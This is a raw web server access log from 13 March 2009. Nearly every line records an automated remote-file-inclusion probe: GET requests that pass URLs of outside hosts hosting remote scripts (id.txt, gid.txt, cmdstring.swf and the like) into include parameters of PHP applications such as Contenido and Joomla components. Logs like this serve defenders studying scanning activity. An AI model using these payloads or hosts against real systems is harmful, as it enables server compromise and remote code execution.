78.40.226.135 - - [13/Mar/2009:05:24:05 -0500] "GET /logs/access_log.1217289600//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=Kenthu? HTTP/1.1" 404 365 "-""libwww-perl/5.79"
78.40.226.135 - - [13/Mar/2009:05:24:07 -0500] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=Kenthu? HTTP/1.1" 404 338 "-""libwww-perl/5.79"
78.40.226.135 - - [13/Mar/2009:05:24:09 -0500] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=Kenthu? HTTP/1.1" 404 343 "-""libwww-perl/5.79"
202.125.46.29 - - [13/Mar/2009:05:24:11 -0500] "GET /logs/access_log.1219536000/index.php?redir=http://zacs.ca/blm/images/banner.gif?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
211.202.2.220 - - [13/Mar/2009:05:24:11 -0500] "GET /logs/access_log.1214956800%20%20//?_zb_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 314 "-""Mozilla/5.0"
202.53.250.24 - - [13/Mar/2009:05:25:25 -0500] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://roadone.net//board//data/photo/db/z6id.txt??? HTTP/1.1" 404 338 "-""libwww-perl/5.805"
202.53.250.24 - - [13/Mar/2009:05:25:25 -0500] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://roadone.net//board//data/photo/db/z6id.txt??? HTTP/1.1" 404 343 "-""libwww-perl/5.805"
70.38.31.50 - - [13/Mar/2009:05:25:28 -0500] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://admins.onceinalifespan.com/gid.txt?%0D?? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
70.38.31.50 - - [13/Mar/2009:05:25:28 -0500] "GET /logs/access_log.1205366400//faqsupport/samplefaqsupport.php?path[docroot]=http://admins.onceinalifespan.com/gid.txt?%0D?? HTTP/1.1" 404 343 "-""libwww-perl/5.805"
70.38.31.50 - - [13/Mar/2009:05:25:28 -0500] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://admins.onceinalifespan.com/gid.txt?%0D?? HTTP/1.1" 404 316 "-""libwww-perl/5.805"
67.222.129.18 - - [13/Mar/2009:05:25:47 -0500] "GET /logs/access_log.1216944000/index.php?redir=http://www.arayam.com/livechat/id1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
67.222.129.18 - - [13/Mar/2009:05:25:50 -0500] "GET /logs/access_log.1219536000/index.php?redir=http://www.arayam.com/livechat/id1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
202.59.205.160 - - [13/Mar/2009:05:25:57 -0500] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://roadone.net//board//data/photo/db/z6id.txt??? HTTP/1.1" 404 338 "-""libwww-perl/5.812"
202.59.205.160 - - [13/Mar/2009:05:25:57 -0500] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://roadone.net//board//data/photo/db/z6id.txt??? HTTP/1.1" 404 343 "-""libwww-perl/5.812"
70.38.31.50 - - [13/Mar/2009:05:26:19 -0500] "GET /logs/access_log.1210550400//faqsupport/samplefaqsupport.php?path[docroot]=http://admins.onceinalifespan.com/gid.txt?%0D?? HTTP/1.1" 404 343 "-""libwww-perl/5.805"
70.38.31.50 - - [13/Mar/2009:05:26:28 -0500] "GET /logs/access_log.1202428800%20//faqsupport/samplefaqsupport.php?path[docroot]=http://admins.onceinalifespan.com/gid.txt?%0D?? HTTP/1.1" 404 344 "-""libwww-perl/5.805"
202.59.205.160 - - [13/Mar/2009:05:26:47 -0500] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://roadone.net//board//data/photo/db/z6id.txt??? HTTP/1.1" 404 338 "-""libwww-perl/5.812"
202.59.205.160 - - [13/Mar/2009:05:26:47 -0500] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://roadone.net//board//data/photo/db/z6id.txt??? HTTP/1.1" 404 343 "-""libwww-perl/5.812"
202.53.250.24 - - [13/Mar/2009:05:26:53 -0500] "GET /logs/access_log.1216857600//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://roadone.net//board//data/photo/db/z6id.txt??? HTTP/1.1" 404 365 "-""libwww-perl/5.805"
202.59.205.160 - - [13/Mar/2009:05:27:02 -0500] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://roadone.net//board//data/photo/db/z6id.txt??? HTTP/1.1" 404 343 "-""libwww-perl/5.812"
202.59.205.160 - - [13/Mar/2009:05:27:05 -0500] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://roadone.net//board//data/photo/db/z6id.txt??? HTTP/1.1" 404 338 "-""libwww-perl/5.812"
202.59.205.160 - - [13/Mar/2009:05:28:34 -0500] "GET /logs/access_log.1216857600//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://roadone.net//board//data/photo/db/z6id.txt??? HTTP/1.1" 404 365 "-""libwww-perl/5.812"
220.95.212.45 - - [13/Mar/2009:05:29:00 -0500] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://siam2.com/ict/news/photo/.photo/gue/echo.swf??? HTTP/1.1" 404 321 "-""libwww-perl/5.79"
220.95.212.45 - - [13/Mar/2009:05:29:00 -0500] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://siam2.com/ict/news/photo/.photo/gue/echo.swf??? HTTP/1.1" 404 316 "-""libwww-perl/5.79"
220.95.212.45 - - [13/Mar/2009:05:29:00 -0500] "GET /logs/access_log.1205366400//faqsupport/samplefaqsupport.php?path[docroot]=http://siam2.com/ict/news/photo/.photo/gue/echo.swf??? HTTP/1.1" 404 343 "-""libwww-perl/5.79"
211.220.195.71 - - [13/Mar/2009:05:29:07 -0500] "GET /logs/access_log.1219536000/index.php?redir=http://zacs.ca/blm/images/banner.gif?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
211.220.195.71 - - [13/Mar/2009:05:29:07 -0500] "GET /logs/access_log.1216944000/index.php?redir=http://zacs.ca/blm/images/banner.gif?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
220.95.212.45 - - [13/Mar/2009:05:31:05 -0500] "GET /logs/access_log.1215302400%20//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://siam2.com/ict/news/photo/.photo/gue/echo.swf??? HTTP/1.1" 404 322 "-""libwww-perl/5.79"
220.95.212.45 - - [13/Mar/2009:05:31:48 -0500] "GET /logs/access_log.1202428800%20//faqsupport/samplefaqsupport.php?path[docroot]=http://siam2.com/ict/news/photo/.photo/gue/echo.swf??? HTTP/1.1" 404 344 "-""libwww-perl/5.79"
124.217.242.70 - - [13/Mar/2009:05:32:34 -0500] "GET /logs//?path%5Bdocroot%5D=http://zacs.ca/blm/images/banner.jpg?? HTTP/1.1" 200 122044 "-""libwww-perl/5.812"
124.217.242.70 - - [13/Mar/2009:05:32:36 -0500] "GET /logs//?path%5Bdocroot%5D=http://zacs.ca/blm/images/banner.jpg?? HTTP/1.1" 200 122044 "-""libwww-perl/5.812"
124.217.242.70 - - [13/Mar/2009:05:32:37 -0500] "GET //?path%5Bdocroot%5D=http://zacs.ca/blm/images/banner.jpg?? HTTP/1.1" 200 1243 "-""libwww-perl/5.812"
124.217.242.70 - - [13/Mar/2009:05:32:40 -0500] "GET //?path%5Bdocroot%5D=http://zacs.ca/blm/images/banner.jpg?? HTTP/1.1" 200 1243 "-""libwww-perl/5.812"
78.40.226.135 - - [13/Mar/2009:05:32:44 -0500] "GET /logs/access_log.1216857600//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=VuLneRaBillTy? HTTP/1.1" 404 365 "-""libwww-perl/5.79"
78.40.226.135 - - [13/Mar/2009:05:33:07 -0500] "GET /logs/access_log.1216857600//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=Kenthu? HTTP/1.1" 404 365 "-""libwww-perl/5.79"
207.182.137.218 - - [13/Mar/2009:05:33:32 -0500] "GET /logs/access_log.1217289600//components/com_facileforms/facileforms.frame.php?ff_compath=http://vis1.uuuq.com/na-id.txt?? HTTP/1.1" 404 360 "-""libwww-perl/5.820"
207.182.137.218 - - [13/Mar/2009:05:33:32 -0500] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://vis1.uuuq.com/na-id.txt?? HTTP/1.1" 404 333 "-""libwww-perl/5.820"
207.182.137.218 - - [13/Mar/2009:05:33:32 -0500] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://vis1.uuuq.com/na-id.txt?? HTTP/1.1" 404 338 "-""libwww-perl/5.820"
207.182.137.218 - - [13/Mar/2009:05:33:33 -0500] "GET /logs/access_log.1216944000//components/com_facileforms/facileforms.frame.php?ff_compath=http://vis1.uuuq.com/na-id.txt?? HTTP/1.1" 404 360 "-""libwww-perl/5.820"
81.176.229.202 - - [13/Mar/2009:05:33:50 -0500] "GET /logs/access_log.1205366400//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.coins.msk.ru/forum/baner.txt?? HTTP/1.1" 404 353 "-""Mozilla/5.0"
81.176.229.202 - - [13/Mar/2009:05:33:50 -0500] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.coins.msk.ru/forum/baner.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
81.176.229.202 - - [13/Mar/2009:05:33:50 -0500] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.coins.msk.ru/forum/baner.txt?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
67.192.251.146 - - [13/Mar/2009:05:34:13 -0500] "GET /logs/access_log.1212364800//?path%5Bdocroot%5D=http://zacs.ca/blm/images/banner.jpg?? HTTP/1.1" 404 312 "-""libwww-perl/5.805"
67.192.251.146 - - [13/Mar/2009:05:34:13 -0500] "GET //?path%5Bdocroot%5D=http://zacs.ca/blm/images/banner.jpg?? HTTP/1.1" 200 1243 "-""libwww-perl/5.805"
67.192.251.146 - - [13/Mar/2009:05:34:13 -0500] "GET /logs//?path%5Bdocroot%5D=http://zacs.ca/blm/images/banner.jpg?? HTTP/1.1" 200 122044 "-""libwww-perl/5.805"
220.95.212.45 - - [13/Mar/2009:05:34:25 -0500] "GET //RGboard/include/footer.php?_path[counter]=http://siam2.com/ict/news/photo/.photo/gue/echo.swf??? HTTP/1.1" 404 311 "-""libwww-perl/5.79"
81.176.226.164 - - [13/Mar/2009:05:35:25 -0500] "GET /logs//?path%5Bdocroot%5D=http://kashikicks.ru/id.txt?? HTTP/1.1" 200 122044 "-""libwww-perl/5.805"
81.176.226.164 - - [13/Mar/2009:05:35:25 -0500] "GET //?path%5Bdocroot%5D=http://kashikicks.ru/id.txt?? HTTP/1.1" 200 1243 "-""libwww-perl/5.805"
67.76.163.60 - - [13/Mar/2009:05:35:39 -0500] "GET /logs/access_log.1217030400%20%20/?sourcedir=http://compraloenlinea.com.mx//includes/copyright[1].txt??? HTTP/1.1" 404 313 "-""Mozilla/5.0"
67.192.251.146 - - [13/Mar/2009:05:35:57 -0500] "GET /logs/access_log.1215216000//?path%5Bdocroot%5D=http://zacs.ca/blm/images/banner.jpg?? HTTP/1.1" 404 312 "-""libwww-perl/5.805"
58.69.172.67 - - [13/Mar/2009:05:36:13 -0500] "GET //?path%5Bdocroot%5D=http://gumansin.com/id.txt??? HTTP/1.1" 200 1243 "-""Mozilla/5.0"
58.69.172.67 - - [13/Mar/2009:05:36:13 -0500] "GET /logs/access_log.1212364800//?path%5Bdocroot%5D=http://gumansin.com/id.txt??? HTTP/1.1" 404 312 "-""Mozilla/5.0"
67.76.163.60 - - [13/Mar/2009:05:36:27 -0500] "GET /logs/access_log.1218931200%20%20/?sourcedir=http://compraloenlinea.com.mx//includes/copyright[1].txt??? HTTP/1.1" 404 313 "-""Mozilla/5.0"
58.69.172.67 - - [13/Mar/2009:05:36:27 -0500] "GET /logs//?path%5Bdocroot%5D=http://gumansin.com/id.txt??? HTTP/1.1" 200 65375 "-""Mozilla/5.0"
80.83.90.50 - - [13/Mar/2009:05:37:34 -0500] "GET /logs/access_log.1217030400%20%20/?sourcedir=http://tomcrider.com/fx29id1.txt?? HTTP/1.1" 404 313 "-""Mozilla/5.0"
80.83.90.50 - - [13/Mar/2009:05:37:34 -0500] "GET /?sourcedir=http://tomcrider.com/fx29id1.txt?? HTTP/1.1" 200 1243 "-""Mozilla/5.0"
80.83.90.50 - - [13/Mar/2009:05:37:35 -0500] "GET /logs/?sourcedir=http://tomcrider.com/fx29id1.txt?? HTTP/1.1" 200 122039 "-""Mozilla/5.0"
58.69.172.67 - - [13/Mar/2009:05:37:54 -0500] "GET /logs/access_log.1206230400//?path%5Bdocroot%5D=http://gumansin.com/id.txt??? HTTP/1.1" 404 312 "-""Mozilla/5.0"
58.69.172.67 - - [13/Mar/2009:05:38:01 -0500] "GET /logs/access_log.1212364800%20%20//?path%5Bdocroot%5D=http://gumansin.com/id.txt??? HTTP/1.1" 404 314 "-""Mozilla/5.0"
58.69.172.67 - - [13/Mar/2009:05:38:01 -0500] "GET //?path%5Bdocroot%5D=http://gumansin.com/id.txt??? HTTP/1.1" 200 1243 "-""Mozilla/5.0"
80.83.90.50 - - [13/Mar/2009:05:38:06 -0500] "GET /logs/access_log.1218931200%20%20/?sourcedir=http://tomcrider.com/fx29id1.txt?? HTTP/1.1" 404 313 "-""Mozilla/5.0"
58.69.172.67 - - [13/Mar/2009:05:38:12 -0500] "GET /logs//?path%5Bdocroot%5D=http://gumansin.com/id.txt??? HTTP/1.1" 200 36689 "-""Mozilla/5.0"
67.76.163.60 - - [13/Mar/2009:05:39:18 -0500] "GET //RGboard/include/footer.php?_path[counter]=http://gumansin.com/id.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
67.76.163.60 - - [13/Mar/2009:05:39:18 -0500] "GET /logs/access_log.1211328000//RGboard/include/footer.php?_path[counter]=http://gumansin.com/id.txt?? HTTP/1.1" 404 338 "-""Mozilla/5.0"
67.76.163.60 - - [13/Mar/2009:05:39:18 -0500] "GET /logs//RGboard/include/footer.php?_path[counter]=http://gumansin.com/id.txt?? HTTP/1.1" 404 316 "-""Mozilla/5.0"
77.91.201.31 - - [13/Mar/2009:05:41:19 -0500] "GET /logs/access_log.1212364800//?path%5Bdocroot%5D=http://kashikicks.ru/id.txt?? HTTP/1.1" 404 312 "-""libwww-perl/5.823"
77.91.201.31 - - [13/Mar/2009:05:41:19 -0500] "GET //?path%5Bdocroot%5D=http://kashikicks.ru/id.txt?? HTTP/1.1" 200 1243 "-""libwww-perl/5.823"
77.91.201.31 - - [13/Mar/2009:05:41:21 -0500] "GET /logs//?path%5Bdocroot%5D=http://kashikicks.ru/id.txt?? HTTP/1.1" 200 122044 "-""libwww-perl/5.823"
77.91.201.31 - - [13/Mar/2009:05:41:22 -0500] "GET /logs//?path%5Bdocroot%5D=http://www.jungga.co.kr/zboard//skin/zero_vote/images/idfell.txt? HTTP/1.1" 200 122044 "-""libwww-perl/5.823"
77.91.201.31 - - [13/Mar/2009:05:41:22 -0500] "GET /logs//?path%5Bdocroot%5D=http://kashikicks.ru/id.txt?? HTTP/1.1" 200 122044 "-""libwww-perl/5.823"
77.91.201.31 - - [13/Mar/2009:05:41:22 -0500] "GET //?path%5Bdocroot%5D=http://www.jungga.co.kr/zboard//skin/zero_vote/images/idfell.txt? HTTP/1.1" 200 1243 "-""libwww-perl/5.823"
77.91.201.31 - - [13/Mar/2009:05:41:22 -0500] "GET //?path%5Bdocroot%5D=http://kashikicks.ru/id.txt?? HTTP/1.1" 200 1243 "-""libwww-perl/5.823"
77.91.201.31 - - [13/Mar/2009:05:41:26 -0500] "GET /logs/access_log.1212364800//?path%5Bdocroot%5D=http://www.jungga.co.kr/zboard//skin/zero_vote/images/idfell.txt? HTTP/1.1" 404 312 "-""libwww-perl/5.823"
77.91.201.31 - - [13/Mar/2009:05:41:26 -0500] "GET //?path%5Bdocroot%5D=http://www.jungga.co.kr/zboard//skin/zero_vote/images/idfell.txt? HTTP/1.1" 200 1243 "-""libwww-perl/5.823"
77.91.201.31 - - [13/Mar/2009:05:41:27 -0500] "GET /logs//?path%5Bdocroot%5D=http://www.jungga.co.kr/zboard//skin/zero_vote/images/idfell.txt? HTTP/1.1" 200 122044 "-""libwww-perl/5.823"
80.83.90.50 - - [13/Mar/2009:05:43:13 -0500] "GET /logs/access_log.1223251200/?sourcedir=http://tomcrider.com/fx29id1.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
80.83.90.50 - - [13/Mar/2009:05:43:13 -0500] "GET /logs/access_log.1226793600/?sourcedir=http://tomcrider.com/fx29id1.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
58.69.172.67 - - [13/Mar/2009:05:43:52 -0500] "GET /logs/access_log.1211932800%20%20//?path%5Bdocroot%5D=http://gumansin.com/id.txt??? HTTP/1.1" 404 314 "-""Mozilla/5.0"
77.91.201.31 - - [13/Mar/2009:05:44:10 -0500] "GET /logs/access_log.1215216000//?path%5Bdocroot%5D=http://www.jungga.co.kr/zboard//skin/zero_vote/images/idfell.txt? HTTP/1.1" 404 312 "-""libwww-perl/5.823"
81.176.226.164 - - [13/Mar/2009:05:44:12 -0500] "GET /logs/access_log.1212364800//?path%5Bdocroot%5D=http://kashikicks.ru/id.txt?? HTTP/1.1" 404 312 "-""libwww-perl/5.805"
81.176.226.164 - - [13/Mar/2009:05:44:13 -0500] "GET //?path%5Bdocroot%5D=http://kashikicks.ru/id.txt?? HTTP/1.1" 200 1243 "-""libwww-perl/5.805"
77.91.201.31 - - [13/Mar/2009:05:44:13 -0500] "GET /logs/access_log.1215216000//?path%5Bdocroot%5D=http://kashikicks.ru/id.txt?? HTTP/1.1" 404 312 "-""libwww-perl/5.823"
81.176.226.164 - - [13/Mar/2009:05:44:14 -0500] "GET /logs//?path%5Bdocroot%5D=http://kashikicks.ru/id.txt?? HTTP/1.1" 200 122044 "-""libwww-perl/5.805"
220.95.212.45 - - [13/Mar/2009:05:44:18 -0500] "GET /logs/access_log.1216339200//trans/trans.php?trans=ko&page=http://siam2.com/ict/news/photo/.photo/cmdstring.swf? HTTP/1.1" 404 327 "-""libwww-perl/5.79"
220.95.212.45 - - [13/Mar/2009:05:44:18 -0500] "GET /logs/access_log.1216339200//trans/trans.php?trans=fr&page=http://siam2.com/ict/news/photo/.photo/cmdstring.swf? HTTP/1.1" 404 327 "-""libwww-perl/5.79"
220.95.212.45 - - [13/Mar/2009:05:44:19 -0500] "GET /logs//trans/trans.php?trans=fr&page=http://siam2.com/ict/news/photo/.photo/cmdstring.swf? HTTP/1.1" 404 305 "-""libwww-perl/5.79"
220.95.212.45 - - [13/Mar/2009:05:44:19 -0500] "GET /logs//trans/trans.php?trans=ko&page=http://siam2.com/ict/news/photo/.photo/cmdstring.swf? HTTP/1.1" 404 305 "-""libwww-perl/5.79"
67.222.129.18 - - [13/Mar/2009:05:44:33 -0500] "GET /logs/access_log.1210550400//faqsupport/samplefaqsupport.php?path[docroot]=http://www.arayam.com/livechat/id1.txt?? HTTP/1.1" 404 343 "-""Mozilla/5.0"
67.222.129.18 - - [13/Mar/2009:05:44:33 -0500] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://www.arayam.com/livechat/id1.txt?? HTTP/1.1" 404 316 "-""Mozilla/5.0"
67.222.129.18 - - [13/Mar/2009:05:44:33 -0500] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://www.arayam.com/livechat/id1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
67.76.163.60 - - [13/Mar/2009:05:45:28 -0500] "GET //RGboard/include/footer.php?_path[counter]=http://gumansin.com/id.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
67.76.163.60 - - [13/Mar/2009:05:45:28 -0500] "GET /logs//RGboard/include/footer.php?_path[counter]=http://gumansin.com/id.txt?? HTTP/1.1" 404 316 "-""Mozilla/5.0"
67.76.163.60 - - [13/Mar/2009:05:45:29 -0500] "GET /logs/access_log.1211328000//RGboard/include/footer.php?_path[counter]=http://gumansin.com/id.txt?? HTTP/1.1" 404 338 "-""Mozilla/5.0"
67.222.129.18 - - [13/Mar/2009:05:46:10 -0500] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://www.arayam.com/livechat/id1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
67.222.129.18 - - [13/Mar/2009:05:46:10 -0500] "GET /logs/access_log.1210550400//faqsupport/samplefaqsupport.php?path[docroot]=http://www.arayam.com/livechat/id1.txt?? HTTP/1.1" 404 343 "-""Mozilla/5.0"
67.222.129.18 - - [13/Mar/2009:05:46:10 -0500] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://www.arayam.com/livechat/id1.txt?? HTTP/1.1" 404 316 "-""Mozilla/5.0"
139.179.10.6 - - [13/Mar/2009:05:46:23 -0500] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.kimstroy.by//assets/images/roxx.jpg??? HTTP/1.1" 404 314 "-""libwww-perl/5.803"
139.179.10.6 - - [13/Mar/2009:05:46:24 -0500] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.kimstroy.by//assets/images/roxx.jpg??? HTTP/1.1" 404 309 "-""libwww-perl/5.803"
67.222.129.18 - - [13/Mar/2009:05:47:21 -0500] "GET /logs/access_log.1210550400//faqsupport/samplefaqsupport.php?path[docroot]=http://www.arayam.com/livechat/id1.txt?? HTTP/1.1" 404 343 "-""Mozilla/5.0"
67.222.129.18 - - [13/Mar/2009:05:47:21 -0500] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://www.arayam.com/livechat/id1.txt?? HTTP/1.1" 404 316 "-""Mozilla/5.0"
67.222.129.18 - - [13/Mar/2009:05:47:21 -0500] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://www.arayam.com/livechat/id1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
81.176.226.164 - - [13/Mar/2009:05:47:31 -0500] "GET /logs/access_log.1215216000//?path%5Bdocroot%5D=http://kashikicks.ru/id.txt?? HTTP/1.1" 404 312 "-""libwww-perl/5.805"
67.222.129.18 - - [13/Mar/2009:05:49:25 -0500] "GET /logs/access_log.1210550400//faqsupport/samplefaqsupport.php?path[docroot]=http://www.arayam.com/livechat/id1.txt?? HTTP/1.1" 404 343 "-""Mozilla/5.0"
67.222.129.18 - - [13/Mar/2009:05:49:25 -0500] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://www.arayam.com/livechat/id1.txt?? HTTP/1.1" 404 316 "-""Mozilla/5.0"
67.222.129.18 - - [13/Mar/2009:05:49:25 -0500] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://www.arayam.com/livechat/id1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
80.67.26.159 - - [13/Mar/2009:05:49:36 -0500] "GET /logs/access_log.1217116800//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.vendo-sito.com//themes/idfx1.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
80.67.26.159 - - [13/Mar/2009:05:49:36 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.vendo-sito.com//themes/idfx1.txt?? HTTP/1.1" 404 302 "-""Mozilla/5.0"
80.67.26.159 - - [13/Mar/2009:05:49:36 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.vendo-sito.com//themes/idfx1.txt?? HTTP/1.1" 404 307 "-""Mozilla/5.0"
78.40.226.135 - - [13/Mar/2009:05:51:26 -0500] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=VuLneRaBillTy? HTTP/1.1" 404 343 "-""libwww-perl/5.79"
78.40.226.135 - - [13/Mar/2009:05:51:27 -0500] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=VuLneRaBillTy? HTTP/1.1" 404 338 "-""libwww-perl/5.79"
78.40.226.135 - - [13/Mar/2009:05:51:40 -0500] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=Kenthu? HTTP/1.1" 404 343 "-""libwww-perl/5.79"
78.40.226.135 - - [13/Mar/2009:05:51:40 -0500] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=Kenthu? HTTP/1.1" 404 338 "-""libwww-perl/5.79"
80.67.26.159 - - [13/Mar/2009:05:51:58 -0500] "GET /logs/access_log.1217116800%20%20//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.vendo-sito.com//themes/idfx1.txt?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
124.217.242.70 - - [13/Mar/2009:05:56:02 -0500] "GET /logs/access_log.1212364800//?path%5Bdocroot%5D=http://zacs.ca/blm/images/banner.jpg?? HTTP/1.1" 404 312 "-""libwww-perl/5.812"
124.217.242.70 - - [13/Mar/2009:05:56:02 -0500] "GET //?path%5Bdocroot%5D=http://zacs.ca/blm/images/banner.jpg?? HTTP/1.1" 200 1243 "-""libwww-perl/5.812"
124.217.242.70 - - [13/Mar/2009:05:56:05 -0500] "GET /logs//?path%5Bdocroot%5D=http://zacs.ca/blm/images/banner.jpg?? HTTP/1.1" 200 122044 "-""libwww-perl/5.812"
77.221.130.17 - - [13/Mar/2009:05:56:09 -0500] "GET /logs//genlib.php?cms[tngpath]=http://channels.dal.net/har/id.txt?? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
77.221.130.17 - - [13/Mar/2009:05:56:09 -0500] "GET //genlib.php?cms[tngpath]=http://channels.dal.net/har/id.txt?? HTTP/1.1" 404 295 "-""libwww-perl/5.805"
77.221.130.17 - - [13/Mar/2009:05:56:09 -0500] "GET /logs/access_log.1219795200//genlib.php?cms[tngpath]=http://channels.dal.net/har/id.txt?? HTTP/1.1" 404 322 "-""libwww-perl/5.805"
80.67.26.159 - - [13/Mar/2009:05:57:24 -0500] "GET /logs/access_log.1217462400//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.vendo-sito.com//themes/idfx1.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
67.222.129.18 - - [13/Mar/2009:05:57:25 -0500] "GET /logs/access_log.1205366400%20%20//faqsupport/samplefaqsupport.php?path[docroot]=http://www.arayam.com/livechat/id1.txt?? HTTP/1.1" 404 345 "-""Mozilla/5.0"
67.195.37.177 - - [13/Mar/2009:05:58:13 -0500] "GET /robots.txt HTTP/1.0" 404 282 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.37.177 - - [13/Mar/2009:05:58:15 -0500] "GET / HTTP/1.0" 200 1231 "-""Mozilla/5.0 (compatible; Yahoo! DE Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
67.222.129.18 - - [13/Mar/2009:05:59:43 -0500] "GET /logs/access_log.1205366400%20%20//faqsupport/samplefaqsupport.php?path[docroot]=http://www.arayam.com/livechat/id1.txt?? HTTP/1.1" 404 345 "-""Mozilla/5.0"
124.0.71.7 - - [13/Mar/2009:06:00:40 -0500] "GET /logs/access_log.1216944000//components/com_extcalendar/errors.php?error=http://www.7777club.com/b1ttletX.txt??? HTTP/1.1" 404 349 "-""libwww-perl/5.79"
124.0.71.7 - - [13/Mar/2009:06:00:40 -0500] "GET //components/com_extcalendar/errors.php?error=http://www.7777club.com/b1ttletX.txt??? HTTP/1.1" 404 322 "-""libwww-perl/5.79"
124.0.71.7 - - [13/Mar/2009:06:00:41 -0500] "GET /logs//components/com_extcalendar/errors.php?error=http://www.7777club.com/b1ttletX.txt??? HTTP/1.1" 404 327 "-""libwww-perl/5.79"
67.222.129.18 - - [13/Mar/2009:06:01:05 -0500] "GET /logs/access_log.1210550400%20%20//faqsupport/samplefaqsupport.php?path[docroot]=http://www.arayam.com/livechat/id1.txt?? HTTP/1.1" 404 345 "-""Mozilla/5.0"
67.222.129.18 - - [13/Mar/2009:06:03:31 -0500] "GET /logs/access_log.1210550400%20%20//faqsupport/samplefaqsupport.php?path[docroot]=http://www.arayam.com/livechat/id1.txt?? HTTP/1.1" 404 345 "-""Mozilla/5.0"
124.217.242.70 - - [13/Mar/2009:06:03:35 -0500] "GET /logs/access_log.1215216000//?path%5Bdocroot%5D=http://zacs.ca/blm/images/banner.jpg?? HTTP/1.1" 404 312 "-""libwww-perl/5.812"
67.222.129.18 - - [13/Mar/2009:06:04:32 -0500] "GET /logs/access_log.1205366400%20%20//faqsupport/samplefaqsupport.php?path[docroot]=http://www.arayam.com/livechat/id1.txt?? HTTP/1.1" 404 345 "-""Mozilla/5.0"
89.151.87.100 - - [13/Mar/2009:06:05:56 -0500] "GET //Neos_Chronos/header.php?base_folder=http://jiahn.com/ktools_v1/ktools/id.txt??? HTTP/1.1" 404 308 "-""libwww-perl/5.805"
89.151.87.100 - - [13/Mar/2009:06:05:56 -0500] "GET /logs/access_log.1211932800//Neos_Chronos/header.php?base_folder=http://jiahn.com/ktools_v1/ktools/id.txt??? HTTP/1.1" 404 335 "-""libwww-perl/5.805"
89.151.87.100 - - [13/Mar/2009:06:05:56 -0500] "GET /logs//Neos_Chronos/header.php?base_folder=http://jiahn.com/ktools_v1/ktools/id.txt??? HTTP/1.1" 404 313 "-""libwww-perl/5.805"
89.151.87.100 - - [13/Mar/2009:06:06:02 -0500] "GET /logs/access_log.1210550400//Neos_Chronos/header.php?base_folder=http://jiahn.com/ktools_v1/ktools/id.txt??? HTTP/1.1" 404 335 "-""libwww-perl/5.805"
